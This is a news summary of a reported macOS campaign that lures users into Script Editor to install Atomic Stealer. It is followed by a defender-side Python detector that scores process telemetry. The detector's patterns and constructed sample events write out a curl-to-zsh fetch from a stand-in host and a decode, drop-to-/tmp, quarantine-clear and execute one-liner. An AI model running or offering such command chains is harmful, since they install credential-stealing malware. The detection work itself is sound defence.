Overview
- Jamf Threat Labs, which published its findings Wednesday, detailed an active campaign that uses Apple‑themed “storage cleanup” sites to launch Script Editor via an applescript:// link.
- The webpage’s “Execute” button triggers a browser prompt to open Script Editor with pre‑filled code, a switch that sidesteps macOS 26.4’s new paste‑scan warnings in Terminal.
- Once opened, the script runs an obfuscated curl piped to zsh that decodes a base64‑and‑gzip blob, drops a Mach‑O file in /tmp, clears its security attributes, makes it executable, and runs it.
- Jamf identified the final payload as Atomic Stealer, malware that can grab Keychain items, browser wallet data, autofill details, passwords, cookies, and other sensitive files from a Mac.
- Jamf shared indicators such as the dryvecar[.]com domain and urged users to treat Script Editor prompts from webpages as high‑risk, a gap that could push Apple to tighten browser‑to‑app URL handling.
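The shell stage described above (curl piped into zsh, base64 and gzip decoding, a drop into /tmp, cleared extended attributes, chmod +x, then execution) leaves a recognisable footprint in process-execution telemetry. The following Python is an added defender-side example, not code from Jamf or from the original article: it scores constructed process events against indicators taken from that described chain. The event field names (pid, parent, cmdline), the example.invalid host and the sample command lines are all assumptions made up for this illustration, not indicators Jamf published.

```python
"""Score macOS process-execution events against the stager behaviour described above.

Added illustration; sample events are constructed, not real IoCs.
"""
import re
from typing import Dict, List

# Each indicator is one link of the chain the text describes. The regexes are
# intentionally loose (defensive stance: flag for triage, not block).
INDICATORS = [
    # curl output piped straight into a shell interpreter
    ("curl_to_shell", re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)(?:\s|$)")),
    # base64 decoding of an embedded blob
    ("base64_decode", re.compile(r"\bbase64\s+(?:-d|-D|--decode)(?:\s|$)")),
    # gzip decompression of the decoded blob
    ("gzip_decode", re.compile(r"\b(?:gunzip|gzcat|zcat)\b|\bgzip\s+-d(?:\s|$)")),
    # payload written under /tmp via redirect or curl -o
    ("tmp_drop", re.compile(r"(?:>|-o)\s*/tmp/\S+")),
    # extended attributes (quarantine flag) cleared or deleted
    ("xattr_clear", re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)(?:\s|$)")),
    # file made executable
    ("chmod_exec", re.compile(r"\bchmod\s+(?:\+x|[0-7]?7[0-7]{2})(?:\s|$)")),
]

# Parent processes that correspond to the page's entry point (Script Editor
# launched from a browser). Names are assumed telemetry values.
SCRIPT_EDITOR_PARENTS = {"Script Editor", "osascript"}


def _normalize(cmdline: str) -> str:
    """Strip quote and backslash characters so simple quoting-based splitting of
    command names does not hide them from the regexes (assumed normalisation)."""
    return re.sub(r"[\"'\\]", "", cmdline)


def score_event(event: Dict) -> Dict:
    """Return the event with the list of matched indicators and a verdict."""
    cmd = _normalize(event.get("cmdline", ""))
    hits: List[str] = [name for name, rx in INDICATORS if rx.search(cmd)]
    if event.get("parent", "") in SCRIPT_EDITOR_PARENTS:
        hits.append("parent_script_editor")

    # Verdict policy (assumed): three links of the chain, or a curl-to-shell
    # launched from Script Editor, is enough to escalate.
    if len(hits) >= 3 or {"curl_to_shell", "parent_script_editor"} <= set(hits):
        verdict = "high"
    elif len(hits) == 2:
        verdict = "medium"
    else:
        verdict = "low"
    return {**event, "hits": hits, "verdict": verdict}


def triage(events: List[Dict]) -> List[Dict]:
    """Return only the events that scored 'high', in input order."""
    return [scored for scored in map(score_event, events) if scored["verdict"] == "high"]


# Constructed sample telemetry: two events mimic the described chain, two are
# benign developer activity that shares a single indicator each.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "Script Editor",
     "cmdline": "curl -fsSL https://example.invalid/s | zsh"},
    {"pid": 4102, "parent": "zsh",
     "cmdline": "echo H4sIAAAA== | base64 -d | gunzip > /tmp/.agent "
                "&& xattr -c /tmp/.agent && chmod +x /tmp/.agent && /tmp/.agent"},
    {"pid": 4103, "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/release.tar.gz -o /tmp/release.tar.gz"},
    {"pid": 4104, "parent": "Terminal",
     "cmdline": "chmod +x ./build.sh"},
]

if __name__ == "__main__":
    for scored in map(score_event, SAMPLE_EVENTS):
        print(scored["pid"], scored["verdict"], scored["hits"])
```

The two benign events each trip exactly one indicator (a download to /tmp, a chmod +x), which is why the verdict is built on the combination of links rather than any single one; a single `chmod +x` or `curl -o /tmp/...` is everyday developer activity on a Mac, whereas the decode-drop-unquarantine-execute sequence in one command line is not.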